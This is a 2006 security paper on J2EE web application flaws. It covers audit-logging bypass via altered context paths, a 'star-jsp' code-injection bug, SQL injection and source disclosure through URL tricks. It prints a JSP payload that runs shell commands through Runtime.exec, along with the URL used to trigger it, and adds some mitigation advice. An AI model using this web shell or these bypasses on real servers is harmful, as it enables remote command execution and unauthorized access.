##############################################################
							     #
						             #
A few of J2EE-based web applications common vulnerabilities  #
							     #
Author: Micha³ Buæko - sapheal			   	     #
	HACKPL (www.hack.pl)				     #
							     #
							     #
##############################################################


In this paper I would like to talk about a few (out of a big amount)
of the vulns I had bumped into some time ago. I concerns the 
auditing and logging systems as well as the whole web applications 
based on J2EE technology. 

What is auditing & logging system?
Auditing and logging system does care of many security-related
problems (not only) in J2EE applications. From one side, it
does log the users' (logged into the application) activity. 
Moreover, if the activity seems to be abnormal, it might block 
the user.The simplest possible example is detecting the user
trying to exploit the web application using SQL injection. 
Logging and auditing systems often take care of so-called 
subfunctionalities. It means that two different parts of the 
application cannot be accessed by two different users.(or one
user cannot access multiple web application's functionalities 
at one time, and so on). However, in many cases the implementation
of auditing and logging is vulnerable so that it cannot do its
job correctly. 

In this short paper I would like to describe two such 
vulnerabilities that allow the attacker to bypass the auditing and
logging systems in many J2EE-based web applications.

Typical J2EE application does have a context:
http://myserver:someport/context/something.do

Auditing and logging system parses the URL to determine what the
operation is being done. However, an attacker might try to access
the website

http://myserver:someport/context/evil/something.do



In many cases this will lead allow the remote attacker to bypass 
the auditing and logging as the parsing in a part of web 
application is not done correctly. Moreover, in might also an 
attacker to access the parts of  the webapplication that are 
disallowed. 

In is common in J2EE-based web application (and not only!) that 
the two different administrator users should not access the specific
data at the same time. This can also by often bypassed by using
the context bug. 

The context should be checked and the URL should be parsed (suggested
parsing: the last "/"(%2f) should be looked for - however, this is not a 
perfect idea and can be bypassed two by the usage of different encoding)
properly in order not to allow simultaneous access to the same volatile
web application data/process.


This vulnerability is often very helpful if an attacker wants to exploit 
the known "star-jsp" bug. "Star-jsp" bug is another bug in J2EE web 
applications. Not only does it affect the logging and auditing system of
the web application but the whole application. An attacker might try 
to input java code into the field of the web application in order to 
get it compiled by the application server and then, execute it using 
famous "star-jsp" bug. This is our simple exploit (one of possible 
thousands):

<%@ page import="java.io.*" %>
<%
String str=null, 
       out_str="";

try {
   Process p=Runtime.getRuntime().exec("/bin/sh .c ls .la");
   BufferedReader buf = new BufferedReader(new
   InputStreamReader(p.getInputStream()));


   while((str = buf.readLine())!=null) {
      out_str= out_str + str;
   }
}
catch(IOException e) {
   e.printStackTrace();
}
%>
<pre><%=out_str %></pre>


This exploit is given as an input in one of the field 

http://somewebsite/page/page.jsp


Then the JSP hander compiles the page.html file and we 

http://somewebsite/*.jsp/../page/page.html

We can try to execute different commands remotely. 


An attacker might also try to brute force the operations and then
try to to execute the operation that is normally to be executed 
after authorization process is successfully ended. It might lead
to unexpected errors, sensitive information might be revealed.

An attacker might as well try to attack using SQL injection, 
PreparedStatement should be used instead of normal statements.
Input should be properly sanitized, however, this might be a bit
of a problem.

As far as web servers are concerned, many of those are vulnerable,
some of those suffer from handling the URL encoding (e.g. displaying
the source of the files). An attacker might want to access the source
of the files in order to obtain sensitive information about the web
application. The example code below:


String url="jdbc:odbc:Autos";
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
Connection conn = DriverManager.getConnection(url, "admin", "mypass");


The example below shows how to exploit this:

http://somesite/servlet/file/somefile.jhtml

Some time ago it was very popular - "somefile.jhtml" source could be 
revealed. Also using encoded URL and/or taking into consideration
the case sensitivity "JhTmL" might help a lot.


I hope this short article helped those interested in Java-based
web applications' security.


Best regards,
Micha³ Buæko - sapheal
HACKPL
www.hack.pl

# milw0rm.com [2006-11-02]